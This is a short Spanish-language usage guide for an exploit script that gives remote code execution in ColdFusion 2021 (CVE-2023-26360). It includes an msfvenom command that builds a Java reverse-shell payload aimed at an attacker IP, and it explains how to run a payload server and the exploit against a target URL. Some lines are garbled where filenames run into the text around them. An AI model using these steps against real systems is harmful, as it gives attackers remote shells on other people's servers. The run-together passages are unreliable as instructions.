
Exploit para ejecución remota de código en ColdFusion 2021 (CVE-2023-26360)
A veces, los scripts no funcionan en el primer intento. Inténtalo varias veces para que funcione.
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py, por lo que debe inicializarse primero.python3 server.py 8000
El argumento 8000 es el puerto en el que el servidor estará escuchando.
Es importante tener en cuenta que la línea 12 configura la dirección IP del servidor, así que cámbiala:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Al igual que en server.py, el argumento 8000 es el puerto en el que escuchará server.py. Por lo tanto, debe ser el mismo en ambos comandos.
La línea 8 en cve-2023-26360.py establece la dirección IP en la que escuchará server.py. Es necesario configurarla correctamente.
La línea 11 en cve-2023-26360.py establece la dirección IP del servidor ColdFusion, así que cámbiala:
url = "http://192.168.56.102:8500"